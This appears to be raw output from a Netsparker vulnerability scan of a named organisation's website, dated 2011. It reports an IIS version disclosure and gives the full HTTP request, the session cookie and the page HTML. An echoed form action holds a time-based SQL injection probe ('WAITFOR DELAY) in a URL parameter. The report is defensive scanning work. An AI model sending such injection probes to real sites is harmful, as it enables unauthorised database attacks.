Expires: Fri, 08 Apr 2011 17:10:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 982
No menu with that name found
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu='%3bWAITFOR+DELAY+'0%3a0%3a25'--&pk=5hhpqw55na20qc45eudx14yk" id="MenuForm" target="_top">
<div>
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
IIS Version Disclosure
IIS Version Disclosure
1
TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.
Impact
An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.
Remediation
Configure your web server to prevent information leakage from the
SERVER header of its HTTP response.
|
- /Bpaww_com/Menus/SubMenu.aspx
/Bpaww_com/Menus/SubMenu.aspx |
Extracted Version
Microsoft-IIS/6.0
Request
GET /Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a HTTP/1.1
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Referer: http://www.bpaww.com/Bpaww_com/Menus/SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&__EVENTARGUMENT=&__EVENTTARGET=&__PREVIOUSPAGE=_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0&__VIEWSTATE=&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.bpaww.com
Cookie: ASP.NET_SessionId=1z42d445lrw0j43555dorb45
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Fri, 08 Apr 2011 17:10:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['MenuForm'];
if (!theForm) {
theForm = document.MenuForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/Bpaww_com/Menus/WebResource.axd?d=HxRulybcMAqY2MDQ5Z_H3fyi8wZixw0XS3-GPezcAQR0j5f_ah7kNB6_zvLelc15ae9pxVjKX04bFeafKRJgz84TroM1&t=634219308858477393" type="text/javascript"></script>
<div>
<input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
<table id="dList" cellspacing="0" border="0" style="border-collapse:collapse;">
<tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx' target="_top" style="width: 100%;" >General Feedback</a>-->
<a id="dList_ctl00_lnk" title="General Feedback" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl00$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx", false, true))" style="display:inline-block;width:100%;">General Feedback</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/staff.aspx' target="_top" style="width: 100%;" >BPA Staff</a>-->
<a id="dList_ctl01_lnk" title="BPA Staff" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl01$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/staff.aspx", false, true))" style="display:inline-block;width:100%;">BPA Staff</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx' target="_top" style="width: 100%;" >Office Locations</a>-->
<a id="dList_ctl02_lnk" title="Office Locations" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl02$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx", false, true))" style="display:inline-block;width:100%;">Office Locations</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx' target="_top" style="width: 100%;" >Directions</a>-->
<a id="dList_ctl03_lnk" title="Directions" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl03$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx", false, true))" style="display:inline-block;width:100%;">Directions</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx' target="_top" style="width: 100%;" >Become a Member</a>-->
<a id="dList_ctl04_lnk" title="Become a Member" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl04$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx", false, true))" style="display:inline-block;width:100%;">Become a Member</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx' target="_top" style="width: 100%;" >Member Relations Managers</a>-->
<a id="dList_ctl05_lnk" title="Member Relations Managers" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl05$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx", false, true))" style="display:inline-block;width:100%;">Member Relations Managers</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>
Date: Fri, 08 Apr 2011 17:10:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Expires: Fri, 08 Apr 2011 17:10:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sub Menu
</title><link id="DefaultStyle" rel="stylesheet" type="text/css" href="../Styles/DefaultStyle.css" /></head>
<body style="margin: 0;" >
<form name="MenuForm" method="post" action="SubMenu.aspx?menu=ContactBPA&pk=5hhpqw55na20qc45eudx14yk&PropertyTable=ResourceName%3aU3ViTWVudQ%3d%3d%7cContentName%3a" id="MenuForm" target="_top">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="PropertyTable" id="PropertyTable" value="ResourceName:U3ViTWVudQ==|ContentName:" />
<input type="hidden" name="__VIEWSTATE" id="
__VIEWSTATE" value="" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['MenuForm'];
if (!theForm) {
theForm = document.MenuForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/Bpaww_com/Menus/WebResource.axd?d=HxRulybcMAqY2MDQ5Z_H3fyi8wZixw0XS3-GPezcAQR0j5f_ah7kNB6_zvLelc15ae9pxVjKX04bFeafKRJgz84TroM1&t=634219308858477393" type="text/javascript"></script>
<div>
<input type="hidden" name="__PREVIOUSPAGE" id="__PREVIOUSPAGE" value="_XRA2oDiYElnSYYpYnVqVAfc423spkigUUSZB0JV4XBD4iLkQ3U5kb0K0KmphuTsJAn1SLsR01-o_oj-dJzb-d8vhH-q2QM6JvJbllTsexBmlZDO0" />
</div>
<div>
<table class="SubMenu" cellpadding="0" cellspacing="0" border="0">
<tr>
<td>
<table id="dList" cellspacing="0" border="0" style="border-collapse:collapse;">
<tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx' target="_top" style="width: 100%;" >General Feedback</a>-->
<a id="dList_ctl00_lnk" title="General Feedback" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl00$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Contact.aspx", false, true))" style="display:inline-block;width:100%;">General Feedback</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/staff.aspx' target="_top" style="width: 100%;" >BPA Staff</a>-->
<a id="dList_ctl01_lnk" title="BPA Staff" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl01$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/staff.aspx", false, true))" style="display:inline-block;width:100%;">BPA Staff</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx' target="_top" style="width: 100%;" >Office Locations</a>-->
<a id="dList_ctl02_lnk" title="Office Locations" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl02$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/OfficeLocs.aspx", false, true))" style="display:inline-block;width:100%;">Office Locations</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx' target="_top" style="width: 100%;" >Directions</a>-->
<a id="dList_ctl03_lnk" title="Directions" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl03$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Directions.aspx", false, true))" style="display:inline-block;width:100%;">Directions</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx' target="_top" style="width: 100%;" >Become a Member</a>-->
<a id="dList_ctl04_lnk" title="Become a Member" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl04$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/Membership.aspx", false, true))" style="display:inline-block;width:100%;">Become a Member</a>
</td>
</tr><tr>
<td>
<!--<a href='http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx' target="_top" style="width: 100%;" >Member Relations Managers</a>-->
<a id="dList_ctl05_lnk" title="Member Relations Managers" href="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions("dList$ctl05$lnk", "", false, "", "http://www.bpaww.com/Bpaww_com/Pages/MemberRelations.aspx", false, true))" style="display:inline-block;width:100%;">Member Relations Managers</a>
</td>
</tr>
</table>
</td>
</tr>
</table>
</div>
</form>
</body>
</html>